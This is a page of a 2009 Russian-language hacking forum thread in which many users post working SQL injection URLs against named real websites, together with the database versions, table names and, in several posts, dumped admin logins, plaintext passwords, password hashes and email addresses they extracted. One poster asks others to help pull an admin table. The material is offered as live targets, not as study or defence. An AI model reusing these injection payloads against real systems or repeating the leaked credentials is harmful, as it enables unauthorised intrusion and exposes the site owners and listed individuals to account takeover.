ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9281  
Старый 09.05.2009, 21:53
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Код:
http://www.technolex-anwaelte.de/index.php?id=43&news_id=1+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
php-info:
Код:
http://www.technolex-anwaelte.de/info.php
админка:
Код:
http://www.technolex-anwaelte.de/admin/
Просмотр дир:
Код:
http://www.technolex-anwaelte.de/admin/index_upload.php?dir=../
Пароли к админке:
1:technolex:technolex!
2:14v:14v
 
Ответить с цитированием

  #9282  
Старый 09.05.2009, 23:53
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://kiteonline.net/pages/news_detail.php?id=-34+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11

Database Version: 5.0.67-community
Database name: kiteonli_dbkite
User name: kiteonli_kitesit@localhost

In database kiteonli_dbkite found table adminusers
1 : firstname
2 : lastname
3 : email
4 : username
5 : password
6 : approval
7 : tbDate
8 : userid
 
Ответить с цитированием

  #9283  
Старый 10.05.2009, 00:07
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.stadiya.ru/news/?id=-434+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
stadiya_@imarket1.2x4.ru:stadiya_:4.1.22-log

тИЦ: 100
PR:4
 
Ответить с цитированием

  #9284  
Старый 10.05.2009, 00:48
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://www.sim.misto.zp.ua/show.php?id=-746+union+sele ct+concat(u ser(),0x0B,database(),0x0B,version())+--+
Цитата:
mistozpu_misto@localhost
mistozpu_smile
5.0.67-community-log
http://www.sim.misto.zp.ua/show.php?id=-746+union+select+concat(TABLE_NAME,0x0B,COLUMN _NAME)+from+information_schema.columns+lim it+179,10+--+

Цитата:
table: admin
columns: password
вот только немогу ниче с табл админ взять, не пойму че это, если у кого получется стянуть с админа свисните в личку, пасиб
 
Ответить с цитированием

  #9285  
Старый 10.05.2009, 01:16
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию

_http://www.mango-mango.ru/news/index.php?page=single&rec=21
_http://www.mango-mango.ru/news/index.php?page=single&rec=21+order+by+7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,2,3,4,5,6,7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,version(),database(),4,user(),6, 7+--+

version - 4.1.22-sta
database - mangoman_base
user - mangoman_user@localhost

Таблицы:
customers
articles
news
 
Ответить с цитированием

  #9286  
Старый 10.05.2009, 10:17
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
http://www.flashadvisor.com/movie/index.php?viewCat=5+UNION+SELECT+1,2,3,concat_ws(0 x3a,version(),user(),database()),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--
Database Version: 5.0.67-community-log
Database name: flash_flashadvisor
User name: flash_flash@localhost


Цитата:
Getting Data from table vb_user from database flash_flashadvisor
Fields usernameassword:email

[0]:jitender:5e8514b0206009b14bd4792bd5eba75b:webmast er@flashadvisor.com
[1]:Anonymous:cad705a850274fce340b5228dad3565c:
[2]:imported_admin:54f8204238a02f62f1c54196f8a6febe:i nfo@flashadvisor.com
[3]:arun:29ee897dae199eeaa46075269845a3b5:info@netwea veronline.com
[4]:jhones:e50beb1d884c485a0ea84d906f107f43:lrai_sand y@yahoo.co.in
[5]:jeet:4b9b950ac479ec4f8e78c772af7144a3:forum@flash advisor.com

ps. 1-ая и 5-ая учётки админы)
__________________________________________________ _________________

[QUOTE]http://elgraficotam.com.mx/noticia.php?id=7518+union+selecT+version(),databas e(),3,user(),5,


версия_нах() : 4.1.22-standard
юзерь() : elgrafic_u
базэ() : elgrafic_bd

Последний раз редактировалось F4R; 10.05.2009 в 10:25..
 
Ответить с цитированием

  #9287  
Старый 10.05.2009, 10:33
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.go2usa.ru/news.php?id=-143+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9--
sunnyart_usa@localhost:4.0.27-standard:sunnyart_usa
PR:2
тИЦ: 40


Код:
http://www.avia-line.ru/news/index.php?id=-23+union+select+concat_ws(0x3a,user(),version(),database())+from+users--&lang=rus
avialin7_pilot@localhost:4.0.27-log:avialin7_avia
Код:
http://www.avia-line.ru/news/index.php?id=-23+union+select+concat_ws(0x3a,username,password)+from+users--&lang=rus
admin1:2d40ebdd5c4dd48caba41846aa81c820fb51e67f
PR:2
тИЦ: 60

Последний раз редактировалось ..::TROYAN::..; 10.05.2009 в 10:50..
 
Ответить с цитированием

  #9288  
Старый 10.05.2009, 13:12
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.art-legion.com/page.php?id=-1%20union%20select%201,2,concat_ws(0x3a,id,login,p assword,name,email,priv),4,5,6,7,8,9,10%20from%20a legion_admins%20--

1:artmooncat:artsql:superadmin:sam@netservise.ru:0
 
Ответить с цитированием

  #9289  
Старый 10.05.2009, 13:17
rushter
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858

Репутация: 979


Отправить сообщение для rushter с помощью ICQ
По умолчанию

Цитата:
http://www.yellowpages.md/news2/news.php?id=-260+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,database(),version()),8,9,10,11,12--
yellowpages@localhost:yellowpages:4.1.22
 
Ответить с цитированием

Comunist's
  #9290  
Старый 10.05.2009, 14:00
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Comunist's

http://www.utcm.md/index.php?action=content&id=-6%27+union+select+1,concat_ws(0x3a,version(),datab ase(),useR(),@@version_compile_os)/*



Database Version: 5.0.27
Database name: utcmmd
User name: utcmmd@localhost
Os : portbld-freebsd6.2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ